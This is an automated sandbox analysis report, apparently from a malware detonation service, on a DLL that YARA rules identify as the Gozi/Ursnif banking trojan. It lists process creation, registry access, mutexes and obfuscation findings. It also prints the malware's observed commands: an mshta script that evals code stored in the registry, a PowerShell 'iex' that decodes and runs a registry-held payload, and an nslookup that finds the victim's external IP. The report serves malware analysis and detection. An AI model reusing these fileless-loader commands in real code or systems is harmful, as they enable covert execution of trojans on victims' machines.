Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF6B00 26_2_0000016D9CFF6B00
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFEFCA0 26_2_0000016D9CFEFCA0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D007D44 26_2_0000016D9D007D44
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00C560 26_2_0000016D9D00C560
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF1C0C 26_2_0000016D9CFF1C0C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D0003EC 26_2_0000016D9D0003EC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE5DA8 26_2_0000016D9CFE5DA8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF25A4 26_2_0000016D9CFF25A4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D0093FC 26_2_0000016D9D0093FC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF6528 26_2_0000016D9CFF6528
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFEECE0 26_2_0000016D9CFEECE0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFCE90 26_2_0000016D9CFFCE90
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE1600 26_2_0000016D9CFE1600
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF75D8 26_2_0000016D9CFF75D8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE65D8 26_2_0000016D9CFE65D8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF8DD0 26_2_0000016D9CFF8DD0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D010614 26_2_0000016D9D010614
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFEDF58 26_2_0000016D9CFEDF58
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE96D8 26_2_0000016D9CFE96D8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D02138C 26_2_0000016D9D02138C
PE file does not import any functions
Source: ljarxop3.dll.19.dr Static PE information: No import functions for PE file found
Source: huo1uow1.dll.21.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 2200.dll Binary or memory string: OriginalFilenameHunt.dll6 vs 2200.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: 2200.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 2200.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@33/166@21/4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F229C CreateToolhelp32Snapshot,FindCloseChangeNotification, 1_2_001F229C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFBA71BC-6CCB-11EB-90EB-ECF4BBEA1588}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{26B249E4-4D23-486C-07BA-D1FC2B8E95F0}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{263DB3FF-4D32-482F-07BA-D1FC2B8E95F0}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0EDC61D8-15B4-7076-0F22-19A4B3765D18}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFCB7F517F8398872F.TMP Jump to behavior
Source: 2200.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: 2200.dll Virustotal: Detection: 16%
Source: 2200.dll ReversingLabs: Detection: 39%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2200.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A4AC.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2200.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source: Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll
Source: Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source: 2200.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2200.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2200.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2200.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2200.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B15BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00B15BD5
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001FAC00 push ecx; ret 1_2_001FAC09
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001FAF33 push ecx; ret 1_2_001FAF43
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B37177 push ecx; ret 1_2_00B37187
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B36E10 push ecx; ret 1_2_00B36E19
Source: C:\Windows\System32\control.exe Code function: 24_2_0098C131 push 3B000001h; retf 24_2_0098C136
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00C131 push 3B000001h; retf 26_2_0000016D9D00C136

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
